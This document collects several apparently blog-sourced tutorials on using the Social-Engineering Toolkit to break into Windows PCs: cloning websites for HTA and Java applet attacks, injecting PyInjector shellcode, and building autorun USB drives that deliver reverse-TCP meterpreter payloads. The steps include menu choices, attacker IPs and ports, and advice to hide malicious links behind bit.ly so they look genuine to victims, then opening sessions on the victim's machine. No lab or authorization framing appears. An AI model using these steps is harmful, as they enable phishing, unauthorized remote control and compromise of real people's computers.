Hack Remote PC using HTA Attack in SET Toolkit

The HTA Attack method will allow you to clone a site and perform PowerShell injection through HTA files which can be used for Windows-based PowerShell exploitation through the browser.

Our method for HTA attack is through setoolkit. For this, open setoolkit in your Kali. And from the menu given choose the first option by typing 1 to access social engineering tools.

From the next given menu, choose the second option by typing 2 to go into website attack vendors.

From the further given menu choose option 8 to select the HTA attack method.

Once you have selected the option 8 for HTA attack, next you need to select option 2 which will allow you to clone a site. Once selected the option 2, it will ask the URL of the site you want to clone. Provide the desired URL as here we have given ‘www.ignitetechnologies.in’.

After giving the URL it will ask you to select the type of meterpreter you want. Select the third one by typing 3.

Once you hit enter after typing 3, the process will start and you will have the handler (multi/handler)

Now convert your malicious IP into the bit.ly link which will appear more genuine to victims when you will share this link with them.

When the victim will browse above malicious link, the file will be saved and automatically executed in the victim’s PC after being saved; as shown in the image below:

Then you will have your meterpreter session. You can use the command ‘sysinfo’ to have the basic information about the victim’s PC.

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

Bypassing Antivirus using Multi Pyinjector Shell Code Injection in SET Toolkit

Open your backtrack terminal & Type cd /pentest/exploits/set

Now Open Social Engineering Toolkit (SET). /set

Now we will choose option 5, “Update the Social-Engineering Toolkit

Now we will choose option 1, “Social-Engineering Attacks

Now we will choose option 2, “Website Attack Vectors

Now we will choose the option 1 the Java Applet Attack Method

Now we will choose option 2, “Site Cloner

Are you using NAT/PORT Forwarding: no

Enter the IP address to connect back on: 192.168.1.3 (IP address of Your PC)

Enter the URL to clone: http://www.gmail.com (but you can use any website to run the Java Applet)

Now choose 16 “Multi PyInjector Shellcode Injection”,

Port of the attacker computer. In this example I use port 443

Select the payload you want to deliver via shellcodeexec press enter here

Now again select Port of the attacker computer. In this example I use port 444 and 445

Select the payload you want to deliver via shellcodeexec press enter here

Now it creates the backdoor program, encodes and packs. It creates the website that you want to use and starts up a listening service looking for people to connect. When done, your screen will look like this:

Now an URL you should give to your victim http://192.168.1.3

When the victim open that link in their browser, immediately it will alert a dialog box about digital signature cannot be verified like picture below.

You now have access to the victims PC. Use “sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID

Hack Windows 7 PC using USB Device and SET Toolkit (Infectious Media Generator Attack)

Infectious Media Generator is a relatively simple attack vector. SET will create a Metasploit-based payload, setup a listener for you and generate a folder that needs to be burned or written to a DVD/USB drive. Once inserted, if AutoRun is enabled, the code will automatically execute and take control of the machine.

Open your backtrack terminal & Type cd /pentest/exploits/set

Now Open Social Engineering Toolkit (SET). /set

Now we will choose option 1, “Social-Engineering Attacks

Now choose option 3, “Infectious Media Generator

Choose option 2, “Standard Metaspolit Executable

Enter IP Address for Reverse Connection type your IP Address (IP Address of Attacker PC)

Now choose 2 “Windows reverse_tcp Meterpreter”, but you have several to choose from including your own program.

Choose option 16, “Backdoored Executable (BEST)

Port of the attacker computer. In this example I use port 4444, but you can change to 443

There’s two file autorun.inf and program.exe inside /pentest/exploits/set/autorun folder

Now copy both file in USB Drive When the victim plug our malicious USB and the autorun working

You now have access to the victims PC. Use “sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID

PyInjector Shellcode Injection attack on Remote PC using Social Engineering Toolkit

PyInjector is a python tool that will take a command line argument similar to shellcodeexec that will allow you to paste native shellcode into the application and have it automatically execute the shellcode for you

Open your backtrack terminal & Type cd /pentest/exploits/set

Now Open Social Engineering Toolkit (SET). /set

Now we will choose option 5, “Update the Social-Engineering Toolkit

Now we will choose option 1, “Social-Engineering Attacks

Now we will choose option 2, “Website Attack Vectors

Now we will choose the option 1 the Java Applet Attack Method

Now we will choose option 2, “Site Cloner

Are you using NAT/PORT Forwarding: no

Enter the IP address to connect back on: 192.168.1.5 (IP address of Your PC)

Enter the URL to clone: https://www.hackingarticles.in (but you can use any website to run the Java Applet)

Now choose 15 “PyInjector Shellcode Injection”, but you have several to choose from including your own program.

Port of the attacker computer. In this example I use port 443, but you can change to 4444

Select the payload you want to deliver via shellcodeexec press enter here

Now it creates the backdoor program, encodes and packs. It creates the website that you want to use and starts up a listening service looking for people to connect. When done, your screen will look like this:

Now an URL you should give to your victim http://192.168.1.5

When the victim open that link in their browser, immediately it will alert a dialog box about digital signature cannot be verified like picture below.

You now have access to the victims PC. Use “sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID